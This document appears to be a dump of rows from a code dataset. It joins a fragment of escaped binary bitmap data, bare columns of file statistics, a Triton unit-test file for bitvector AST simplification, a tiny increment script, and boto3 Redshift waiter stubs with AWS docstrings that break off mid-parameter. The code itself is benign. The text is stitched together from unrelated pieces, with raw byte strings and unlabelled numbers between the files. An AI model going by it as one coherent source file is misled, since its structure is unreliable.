\x10\x10\x08\x08\x08\x00\x00\x008\x08\x08\x08\x08\x08\x08\x08\x088\x00\x00\x10\x10(D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x008D<DD>\x00\x00\x00\x00\xc0@XdDDD\xf8\x00\x00\x00\x00\x00\x00<D@@D8\x00\x00\x00\x00\x0c\x044LDDD>\x00\x00\x00\x00\x00\x008D|@@<\x00\x00\x00\x00\x1c | |\x00\x00\x00\x00\x00\x006LDDD<\x048\x00\x00\xc0@XdDDD\xee\x00\x00\x00\x00\x10\x00p\x10\x10\x10\x10|\x00\x00\x00\x00\x10\x00x\x08\x08\x08\x08\x08\x08p\x00\x00\xc0@\\HpPH\xdc\x00\x00\x00\x000\x10\x10\x10\x10\x10\x10|\x00\x00\x00\x00\x00\x00\xe8TTTT\xfe\x00\x00\x00\x00\x00\x00\xd8dDDD\xee\x00\x00\x00\x00\x00\x008DDDD8\x00\x00\x00\x00\x00\x00\xd8dDDDx@\xe0\x00\x00\x00\x006LDDD<\x04\x0e\x00\x00\x00\x00l0 |\x00\x00\x00\x00\x00\x00<D8\x04Dx\x00\x00\x00\x00\x00 | "\x1c\x00\x00\x00\x00\x00\x00\xccDDDL6\x00\x00\x00\x00\x00\x00\xeeDD((\x10\x00\x00\x00\x00\x00\x00\xeeDTTT(\x00\x00\x00\x00\x00\x00\xccH00H\xcc\x00\x00\x00\x00\x00\x00\xeeD$(\x18\x10\x10x\x00\x00\x00\x00|H\x10 D|\x00\x00\x00\x00\x08\x10\x10\x10\x10 \x10\x10\x10\x08\x00\x00\x10\x10\x10\x10\x10\x10\x10\x10\x10\x00\x00\x00 \x10\x10\x10\x10\x08\x10\x10\x10 \x00\x00\x00\x00\x00\x00$X\x00\x00\x00\x00\x00'
| 666.2
| 3,293
| 0.733714
| 759
| 3,331
| 3.220026
| 0.119895
| 0.844517
| 0.920622
| 0.829787
| 0.709083
| 0.572831
| 0.402209
| 0.317512
| 0.2991
| 0.252455
| 0
| 0.430976
| 0.019213
| 3,331
| 4
| 3,294
| 832.75
| 0.317111
| 0
| 0
| 0
| 0
| 0.333333
| 0.98559
| 0.956169
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
2bb0e280ec76855c1f31ea8435f7a89931c064f6
| 17,319
|
py
|
Python
|
src/testers/unittests/test_ast_simplification.py
|
XVilka/Triton
|
a6645a1d0e08b27b6698be7c2c0896d3367fd0b4
|
[
"Apache-2.0"
] | 2
|
2021-01-29T09:26:22.000Z
|
2021-04-23T16:28:44.000Z
|
src/testers/unittests/test_ast_simplification.py
|
XVilka/Triton
|
a6645a1d0e08b27b6698be7c2c0896d3367fd0b4
|
[
"Apache-2.0"
] | null | null | null |
src/testers/unittests/test_ast_simplification.py
|
XVilka/Triton
|
a6645a1d0e08b27b6698be7c2c0896d3367fd0b4
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
"""Testing AST simplification."""
import unittest
from triton import *
class TestAstSimplification1(unittest.TestCase):
"""Testing AST simplification."""
def setUp(self):
self.ctx = TritonContext()
self.ctx.setArchitecture(ARCH.X86_64)
self.ctx.addCallback(self.xor_1, CALLBACK.SYMBOLIC_SIMPLIFICATION)
self.ctx.addCallback(self.xor_2, CALLBACK.SYMBOLIC_SIMPLIFICATION)
self.astCtxt = self.ctx.getAstContext()
def test_simplification(self):
a = self.astCtxt.bv(1, 8)
b = self.astCtxt.bv(2, 8)
# Example 1
c = a ^ a
c = self.ctx.simplify(c)
self.assertEqual(str(c), "(_ bv0 8)")
c = a ^ b
c = self.ctx.simplify(c)
self.assertEqual(str(c), "(bvxor (_ bv1 8) (_ bv2 8))")
c = (a & ~b) | (~a & b)
c = self.ctx.simplify(c)
self.assertEqual(str(c), "(bvxor (_ bv1 8) (_ bv2 8))")
# Example 2 - forme B
c = (~b & a) | (~a & b)
c = self.ctx.simplify(c)
self.assertEqual(str(c), "(bvxor (_ bv1 8) (_ bv2 8))")
# Example 2 - forme C
c = (~b & a) | (b & ~a)
c = self.ctx.simplify(c)
self.assertEqual(str(c), "(bvxor (_ bv1 8) (_ bv2 8))")
# Example 2 - forme D
c = (b & ~a) | (~b & a)
c = self.ctx.simplify(c)
self.assertEqual(str(c), "(bvxor (_ bv2 8) (_ bv1 8))")
return
# a ^ a -> a = 0
@staticmethod
def xor_1(api, node):
if node.getType() == AST_NODE.BVXOR:
if node.getChildren()[0].equalTo(node.getChildren()[1]):
return api.getAstContext().bv(0, node.getBitvectorSize())
return node
# ((a & ~b) | (~a & b)) -> (a ^ b)
@staticmethod
def xor_2(api, node):
def getNot(node):
a = node.getChildren()[0]
b = node.getChildren()[1]
if a.getType() == AST_NODE.BVNOT and b.getType() != AST_NODE.BVNOT:
return a
if b.getType() == AST_NODE.BVNOT and a.getType() != AST_NODE.BVNOT:
return b
return None
def getNonNot(node):
a = node.getChildren()[0]
b = node.getChildren()[1]
if a.getType() != AST_NODE.BVNOT and b.getType() == AST_NODE.BVNOT:
return a
if b.getType() != AST_NODE.BVNOT and a.getType() == AST_NODE.BVNOT:
return b
return None
if node.getType() == AST_NODE.BVOR:
c1 = node.getChildren()[0]
c2 = node.getChildren()[1]
if c1.getType() == AST_NODE.BVAND and c2.getType() == AST_NODE.BVAND:
c1_not = getNot(c1)
c2_not = getNot(c2)
c1_nonNot = getNonNot(c1)
c2_nonNot = getNonNot(c2)
if c1_not.equalTo(~c2_nonNot) and c2_not.equalTo(~c1_nonNot):
return c1_nonNot ^ c2_nonNot
return node
class TestAstSimplification2(unittest.TestCase):
"""Testing AST simplification. From #740."""
def setUp(self):
self.ctx = TritonContext()
self.ctx.setArchitecture(ARCH.X86_64)
self.ctx.addCallback(self.simplification_0, CALLBACK.SYMBOLIC_SIMPLIFICATION)
self.astCtxt = self.ctx.getAstContext()
def test_simplification(self):
# (bvadd
# (bvadd
# (bvsub SymVar_2 (_ bv2142533311 64))
# (_ bv1 64)
# )
# (_ bv2142533311 64)
# )
a = self.astCtxt.bv(1, 64)
b = self.astCtxt.bv(2142533311, 64)
c = self.astCtxt.variable(self.ctx.newSymbolicVariable(64))
node = (((c - b) + a) + b)
snode = self.ctx.simplify(node)
self.assertEqual(node.getType(), AST_NODE.BVADD)
self.assertEqual(node.getChildren()[0], c)
self.assertEqual(node.getChildren()[1], a)
@staticmethod
def simplification_0(ctx, node):
# (((var - val1) + val2) + val1) => (var + val2)
if node.getType() == AST_NODE.BVADD:
c0 = node.getChildren()[0] # ((var + val1) + val2)
c1 = node.getChildren()[1] # val1
if c0.getType() == AST_NODE.BVADD and c1.getType() == AST_NODE.BV:
c00 = c0.getChildren()[0] # (var + val1)
c01 = c0.getChildren()[1] # val2
# ((var + val1) + val2)
if c00.getType() == AST_NODE.BVSUB and c01.getType() == AST_NODE.BV:
c000 = c00.getChildren()[0] # var
c001 = c00.getChildren()[1] # val1
# (var + val1)
if c001.getType() == AST_NODE.BV and c001.evaluate() == c1.evaluate():
# return (var + val2)
return c000 + c01
return node
class TestAstSimplification3(unittest.TestCase):
"""Testing AST simplification"""
def setUp(self):
self.ctx = TritonContext()
self.ctx.setArchitecture(ARCH.X86)
self.ast = self.ctx.getAstContext()
def proof(self, n):
if self.ctx.isSat(self.ast.lnot(n)) == True:
return False
return True
def test_add1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvadd(a, b)
self.assertTrue(self.proof(n == a))
def test_add2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvadd(b, a)
self.assertTrue(self.proof(n == a))
def test_and1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvand(a, b)
self.assertTrue(self.proof(n == 0))
def test_and2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvand(b, a)
self.assertTrue(self.proof(n == 0))
def test_and3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(-1, 32)
n = self.ast.bvand(b, a)
self.assertTrue(self.proof(n == a))
def test_and4(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(-1, 32)
n = self.ast.bvand(a, b)
self.assertTrue(self.proof(n == a))
def test_and5(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
n = self.ast.bvand(a, a)
self.assertTrue(self.proof(n == a))
def test_ashr1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvashr(a, b)
self.assertTrue(self.proof(n == a))
def test_ashr2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvashr(b, a)
self.assertTrue(self.proof(n == 0))
def test_lshr1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvlshr(a, b)
self.assertTrue(self.proof(n == a))
def test_lshr2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvlshr(b, a)
self.assertTrue(self.proof(n == 0))
def test_lshr3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(32, 32)
n = self.ast.bvlshr(a, b)
self.assertTrue(self.proof(n == 0))
def test_mul1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvmul(a, b)
self.assertTrue(self.proof(n == 0))
def test_mul2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvmul(b, a)
self.assertTrue(self.proof(n == 0))
def test_or1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvor(b, a)
self.assertTrue(self.proof(n == a))
def test_or2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvor(a, b)
self.assertTrue(self.proof(n == a))
def test_or3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(-1, 32)
n = self.ast.bvor(a, b)
self.assertTrue(self.proof(n == -1))
def test_or4(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(-1, 32)
n = self.ast.bvor(b, a)
self.assertTrue(self.proof(n == -1))
def test_or5(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
n = self.ast.bvor(a, a)
self.assertTrue(self.proof(n == a))
def test_sdiv1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(1, 32)
n = self.ast.bvsdiv(a, b)
self.assertTrue(self.proof(n == a))
def test_shl1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvshl(b, a)
self.assertTrue(self.proof(n == 0))
def test_shl2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvshl(a, b)
self.assertTrue(self.proof(n == a))
def test_shl3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(33, 32)
n = self.ast.bvshl(a, b)
self.assertTrue(self.proof(n == 0))
def test_sub1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvsub(a, b)
self.assertTrue(self.proof(n == a))
def test_sub2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvsub(b, a)
self.assertTrue(self.proof(n == -a))
def test_sub3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
n = self.ast.bvsub(a, a)
self.assertTrue(self.proof(n == 0))
def test_udiv(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(1, 32)
n = self.ast.bvudiv(a, b)
self.assertTrue(self.proof(n == a))
def test_xor1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvxor(a, b)
self.assertTrue(self.proof(n == a))
def test_xor2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvxor(b, a)
self.assertTrue(self.proof(n == a))
def test_xor3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
n = self.ast.bvxor(a, a)
self.assertTrue(self.proof(n == 0))
class TestAstSimplification4(unittest.TestCase):
"""Testing AST simplification"""
def setUp(self):
self.ctx = TritonContext()
self.ctx.setArchitecture(ARCH.X86)
self.ast = self.ctx.getAstContext()
self.ctx.setMode(MODE.AST_OPTIMIZATIONS, True)
def proof(self, n):
if self.ctx.isSat(self.ast.lnot(n)) == True:
return False
return True
def test_add1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvadd(a, b)
self.assertTrue(self.proof(n == a))
def test_add2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvadd(b, a)
self.assertTrue(self.proof(n == a))
def test_and1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvand(a, b)
self.assertTrue(self.proof(n == 0))
def test_and2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvand(b, a)
self.assertTrue(self.proof(n == 0))
def test_and3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(-1, 32)
n = self.ast.bvand(b, a)
self.assertTrue(self.proof(n == a))
def test_and4(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(-1, 32)
n = self.ast.bvand(a, b)
self.assertTrue(self.proof(n == a))
def test_and5(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
n = self.ast.bvand(a, a)
self.assertTrue(self.proof(n == a))
def test_ashr1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvashr(a, b)
self.assertTrue(self.proof(n == a))
def test_ashr2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvashr(b, a)
self.assertTrue(self.proof(n == 0))
def test_lshr1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvlshr(a, b)
self.assertTrue(self.proof(n == a))
def test_lshr2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvlshr(b, a)
self.assertTrue(self.proof(n == 0))
def test_lshr3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(32, 32)
n = self.ast.bvlshr(a, b)
self.assertTrue(self.proof(n == 0))
def test_mul1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvmul(a, b)
self.assertTrue(self.proof(n == 0))
def test_mul2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvmul(b, a)
self.assertTrue(self.proof(n == 0))
def test_or1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvor(b, a)
self.assertTrue(self.proof(n == a))
def test_or2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvor(a, b)
self.assertTrue(self.proof(n == a))
def test_or3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(-1, 32)
n = self.ast.bvor(a, b)
self.assertTrue(self.proof(n == -1))
def test_or4(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(-1, 32)
n = self.ast.bvor(b, a)
self.assertTrue(self.proof(n == -1))
def test_or5(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
n = self.ast.bvor(a, a)
self.assertTrue(self.proof(n == a))
def test_sdiv1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(1, 32)
n = self.ast.bvsdiv(a, b)
self.assertTrue(self.proof(n == a))
def test_shl1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvshl(b, a)
self.assertTrue(self.proof(n == 0))
def test_shl2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvshl(a, b)
self.assertTrue(self.proof(n == a))
def test_shl3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(33, 32)
n = self.ast.bvshl(a, b)
self.assertTrue(self.proof(n == 0))
def test_sub1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvsub(a, b)
self.assertTrue(self.proof(n == a))
def test_sub2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvsub(b, a)
self.assertTrue(self.proof(n == -a))
def test_sub3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
n = self.ast.bvsub(a, a)
self.assertTrue(self.proof(n == 0))
def test_udiv(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(1, 32)
n = self.ast.bvudiv(a, b)
self.assertTrue(self.proof(n == a))
def test_xor1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvxor(a, b)
self.assertTrue(self.proof(n == a))
def test_xor2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvxor(b, a)
self.assertTrue(self.proof(n == a))
def test_xor3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
n = self.ast.bvxor(a, a)
self.assertTrue(self.proof(n == 0))
| 32.863378
| 94
| 0.56054
| 2,420
| 17,319
| 3.96281
| 0.057438
| 0.128467
| 0.057247
| 0.216267
| 0.856204
| 0.836809
| 0.836809
| 0.836809
| 0.836809
| 0.836809
| 0
| 0.044518
| 0.285351
| 17,319
| 526
| 95
| 32.925856
| 0.730306
| 0.032796
| 0
| 0.847291
| 0
| 0
| 0.008622
| 0
| 0
| 0
| 0
| 0
| 0.169951
| 1
| 0.179803
| false
| 0
| 0.004926
| 0
| 0.236453
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a608e218251154c908846ee3550b0eb26ab84bbc
| 77
|
py
|
Python
|
increment.py
|
rresender/python-samples
|
2fb2330f59f3cc0c6b975381e22268a758773b69
|
[
"MIT"
] | null | null | null |
increment.py
|
rresender/python-samples
|
2fb2330f59f3cc0c6b975381e22268a758773b69
|
[
"MIT"
] | null | null | null |
increment.py
|
rresender/python-samples
|
2fb2330f59f3cc0c6b975381e22268a758773b69
|
[
"MIT"
] | null | null | null |
def add_one(num):
return (-(~num))
print(add_one(3))
print(add_one(99))
| 12.833333
| 20
| 0.636364
| 14
| 77
| 3.285714
| 0.571429
| 0.391304
| 0.478261
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0.142857
| 77
| 6
| 21
| 12.833333
| 0.651515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
|
0
| 7
|
a6706c7eaf26b931ebbe9697c1bce4fd98f160f9
| 17,832
|
py
|
Python
|
boto3_type_annotations_with_docs/boto3_type_annotations/redshift/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 119
|
2018-12-01T18:20:57.000Z
|
2022-02-02T10:31:29.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/redshift/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 15
|
2018-11-16T00:16:44.000Z
|
2021-11-13T03:44:18.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/redshift/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 11
|
2019-05-06T05:26:51.000Z
|
2021-09-28T15:27:59.000Z
|
from typing import Dict
from datetime import datetime
from typing import List
from botocore.waiter import Waiter
class ClusterAvailable(Waiter):
def wait(self, ClusterIdentifier: str = None, MaxRecords: int = None, Marker: str = None, TagKeys: List = None, TagValues: List = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`Redshift.Client.describe_clusters` every 60 seconds until a successful state is reached. An error is returned after 30 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/DescribeClusters>`_
**Request Syntax**
::
waiter.wait(
ClusterIdentifier='string',
MaxRecords=123,
Marker='string',
TagKeys=[
'string',
],
TagValues=[
'string',
],
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type ClusterIdentifier: string
:param ClusterIdentifier:
The unique identifier of a cluster whose properties you are requesting. This parameter is case sensitive.
The default is that all clusters defined for an account are returned.
:type MaxRecords: integer
:param MaxRecords:
The maximum number of response records to return in each call. If the number of remaining response records exceeds the specified ``MaxRecords`` value, a value is returned in a ``marker`` field of the response. You can retrieve the next set of records by retrying the command with the returned marker value.
Default: ``100``
Constraints: minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional parameter that specifies the starting point to return a set of response records. When the results of a DescribeClusters request exceed the value specified in ``MaxRecords`` , AWS returns a value in the ``Marker`` field of the response. You can retrieve the next set of response records by providing the returned marker value in the ``Marker`` parameter and retrying the request.
Constraints: You can specify either the **ClusterIdentifier** parameter or the **Marker** parameter, but not both.
:type TagKeys: list
:param TagKeys:
A tag key or keys for which you want to return all matching clusters that are associated with the specified key or keys. For example, suppose that you have clusters that are tagged with keys called ``owner`` and ``environment`` . If you specify both of these tag keys in the request, Amazon Redshift returns a response with the clusters that have either or both of these tag keys associated with them.
- *(string) --*
:type TagValues: list
:param TagValues:
A tag value or values for which you want to return all matching clusters that are associated with the specified tag value or values. For example, suppose that you have clusters that are tagged with values called ``admin`` and ``test`` . If you specify both of these tag values in the request, Amazon Redshift returns a response with the clusters that have either or both of these tag values associated with them.
- *(string) --*
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 60
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 30
:returns: None
"""
pass
class ClusterDeleted(Waiter):
def wait(self, ClusterIdentifier: str = None, MaxRecords: int = None, Marker: str = None, TagKeys: List = None, TagValues: List = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`Redshift.Client.describe_clusters` every 60 seconds until a successful state is reached. An error is returned after 30 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/DescribeClusters>`_
**Request Syntax**
::
waiter.wait(
ClusterIdentifier='string',
MaxRecords=123,
Marker='string',
TagKeys=[
'string',
],
TagValues=[
'string',
],
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type ClusterIdentifier: string
:param ClusterIdentifier:
The unique identifier of a cluster whose properties you are requesting. This parameter is case sensitive.
The default is that all clusters defined for an account are returned.
:type MaxRecords: integer
:param MaxRecords:
The maximum number of response records to return in each call. If the number of remaining response records exceeds the specified ``MaxRecords`` value, a value is returned in a ``marker`` field of the response. You can retrieve the next set of records by retrying the command with the returned marker value.
Default: ``100``
Constraints: minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional parameter that specifies the starting point to return a set of response records. When the results of a DescribeClusters request exceed the value specified in ``MaxRecords`` , AWS returns a value in the ``Marker`` field of the response. You can retrieve the next set of response records by providing the returned marker value in the ``Marker`` parameter and retrying the request.
Constraints: You can specify either the **ClusterIdentifier** parameter or the **Marker** parameter, but not both.
:type TagKeys: list
:param TagKeys:
A tag key or keys for which you want to return all matching clusters that are associated with the specified key or keys. For example, suppose that you have clusters that are tagged with keys called ``owner`` and ``environment`` . If you specify both of these tag keys in the request, Amazon Redshift returns a response with the clusters that have either or both of these tag keys associated with them.
- *(string) --*
:type TagValues: list
:param TagValues:
A tag value or values for which you want to return all matching clusters that are associated with the specified tag value or values. For example, suppose that you have clusters that are tagged with values called ``admin`` and ``test`` . If you specify both of these tag values in the request, Amazon Redshift returns a response with the clusters that have either or both of these tag values associated with them.
- *(string) --*
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 60
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 30
:returns: None
"""
pass
class ClusterRestored(Waiter):
def wait(self, ClusterIdentifier: str = None, MaxRecords: int = None, Marker: str = None, TagKeys: List = None, TagValues: List = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`Redshift.Client.describe_clusters` every 60 seconds until a successful state is reached. An error is returned after 30 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/DescribeClusters>`_
**Request Syntax**
::
waiter.wait(
ClusterIdentifier='string',
MaxRecords=123,
Marker='string',
TagKeys=[
'string',
],
TagValues=[
'string',
],
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type ClusterIdentifier: string
:param ClusterIdentifier:
The unique identifier of a cluster whose properties you are requesting. This parameter is case sensitive.
The default is that all clusters defined for an account are returned.
:type MaxRecords: integer
:param MaxRecords:
The maximum number of response records to return in each call. If the number of remaining response records exceeds the specified ``MaxRecords`` value, a value is returned in a ``marker`` field of the response. You can retrieve the next set of records by retrying the command with the returned marker value.
Default: ``100``
Constraints: minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional parameter that specifies the starting point to return a set of response records. When the results of a DescribeClusters request exceed the value specified in ``MaxRecords`` , AWS returns a value in the ``Marker`` field of the response. You can retrieve the next set of response records by providing the returned marker value in the ``Marker`` parameter and retrying the request.
Constraints: You can specify either the **ClusterIdentifier** parameter or the **Marker** parameter, but not both.
:type TagKeys: list
:param TagKeys:
A tag key or keys for which you want to return all matching clusters that are associated with the specified key or keys. For example, suppose that you have clusters that are tagged with keys called ``owner`` and ``environment`` . If you specify both of these tag keys in the request, Amazon Redshift returns a response with the clusters that have either or both of these tag keys associated with them.
- *(string) --*
:type TagValues: list
:param TagValues:
A tag value or values for which you want to return all matching clusters that are associated with the specified tag value or values. For example, suppose that you have clusters that are tagged with values called ``admin`` and ``test`` . If you specify both of these tag values in the request, Amazon Redshift returns a response with the clusters that have either or both of these tag values associated with them.
- *(string) --*
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 60
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 30
:returns: None
"""
pass
class SnapshotAvailable(Waiter):
def wait(self, ClusterIdentifier: str = None, SnapshotIdentifier: str = None, SnapshotType: str = None, StartTime: datetime = None, EndTime: datetime = None, MaxRecords: int = None, Marker: str = None, OwnerAccount: str = None, TagKeys: List = None, TagValues: List = None, ClusterExists: bool = None, SortingEntities: List = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`Redshift.Client.describe_cluster_snapshots` every 15 seconds until a successful state is reached. An error is returned after 20 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/DescribeClusterSnapshots>`_
**Request Syntax**
::
waiter.wait(
ClusterIdentifier='string',
SnapshotIdentifier='string',
SnapshotType='string',
StartTime=datetime(2015, 1, 1),
EndTime=datetime(2015, 1, 1),
MaxRecords=123,
Marker='string',
OwnerAccount='string',
TagKeys=[
'string',
],
TagValues=[
'string',
],
ClusterExists=True|False,
SortingEntities=[
{
'Attribute': 'SOURCE_TYPE'|'TOTAL_SIZE'|'CREATE_TIME',
'SortOrder': 'ASC'|'DESC'
},
],
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type ClusterIdentifier: string
:param ClusterIdentifier:
The identifier of the cluster which generated the requested snapshots.
:type SnapshotIdentifier: string
:param SnapshotIdentifier:
The snapshot identifier of the snapshot about which to return information.
:type SnapshotType: string
:param SnapshotType:
